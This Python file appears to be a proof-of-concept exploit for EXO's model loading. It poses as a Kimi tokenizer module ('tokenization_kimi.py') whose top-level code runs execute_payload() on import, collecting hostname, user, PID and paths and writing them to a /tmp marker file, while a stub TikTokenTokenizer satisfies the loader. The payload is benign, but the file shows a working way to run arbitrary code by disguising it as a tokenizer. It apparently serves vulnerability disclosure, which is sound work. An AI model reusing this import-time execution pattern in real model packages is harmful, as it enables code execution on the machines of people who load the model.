| |
| |
| |
| |
|
|
| import os |
| import sys |
| from pathlib import Path |
|
|
| |
| |
| |
# Single small file created under /tmp as evidence that this module's
# top-level code ran inside the target process.
POC_MARKER_FILE = "/tmp/exo_poc_marker.txt"


def execute_payload():
    """
    Proof-of-execution payload.

    Collects basic process context (hostname, user, PID, interpreter,
    working directory) and writes it to ``POC_MARKER_FILE``. Deliberately
    non-destructive: the only side effect is one small file under /tmp.
    Failures to write are reported on stdout rather than raised, so the
    host application is never disturbed.
    """
    lines = [
        "=== EXO RCE PoC - Code Execution Confirmed ===",
        f"Hostname: {os.uname().nodename}",
        f"User: {os.getenv('USER', 'unknown')}",
        f"PID: {os.getpid()}",
        f"Python: {sys.executable}",
        f"CWD: {os.getcwd()}",
    ]
    try:
        # Trailing join + newline reproduces the original one-line-per-field
        # layout (every field terminated by "\n", including the last).
        Path(POC_MARKER_FILE).write_text("\n".join(lines) + "\n")
    except Exception as exc:
        # Best-effort only: /tmp may be unwritable in a sandbox.
        print(f"[PoC] Could not write marker file: {exc}")
    else:
        print(f"[PoC] tokenization_kimi executed — marker written to {POC_MARKER_FILE}")


# Fire immediately at import time — that is the whole point of the PoC.
execute_payload()
|
|
| |
| |
| |
| |
| |
| |
| |
|
|
class _InnerModel:
    """Minimal inner model that satisfies EXO's patched encode path.

    Tokenization here is a placeholder: each character maps to its code
    point folded into the 7-bit range, and decoding is the inverse.
    """

    def encode(self, text: str, allowed_special=None) -> list:
        # A falsy argument (None, "") tokenizes to the empty list.
        source = text if text else ""
        tokens = []
        for ch in source:
            tokens.append(ord(ch) % 128)
        return tokens

    def decode(self, tokens, errors="replace") -> str:
        # Inverse of encode for ASCII input: one 7-bit character per token.
        chars = [chr(code % 128) for code in tokens]
        return "".join(chars)
|
|
|
|
class TikTokenTokenizer:
    """
    Stub TikTokenTokenizer to satisfy EXO's tokenizer loading expectations.
    The PoC payload has already executed by the time this class is instantiated.
    """

    def __init__(self, *args, **kwargs):
        # All constructor arguments are accepted and ignored; every
        # instance is identical. The inner stub model does the actual
        # encode/decode work.
        self.model = _InnerModel()
        # Hard-coded special-token ids/strings the loader expects to find.
        # NOTE(review): eos and pad share one id — presumably intentional
        # for this stub; confirm against the real tokenizer if reused.
        self.bos_token_id = 151644
        self.eos_token_id = 151643
        self.pad_token_id = 151643
        self.bos_token = "<|im_start|>"
        self.eos_token = "<|im_end|>"
        print("[PoC] TikTokenTokenizer stub initialised")

    @classmethod
    def from_pretrained(cls, model_path, **kwargs):
        # The checkpoint path is logged but never read.
        print(f"[PoC] TikTokenTokenizer.from_pretrained called with: {model_path}")
        return cls()

    def encode(self, text: str, **kwargs) -> list:
        # Delegate straight to the inner stub; extra kwargs are dropped.
        return self.model.encode(text)

    def decode(self, tokens, **kwargs) -> str:
        # Delegate straight to the inner stub; extra kwargs are dropped.
        return self.model.decode(tokens)
|
|
|
|
# Import-time banner: confirms the module body ran to completion.
print("[PoC] tokenization_kimi.py loaded successfully")
|
|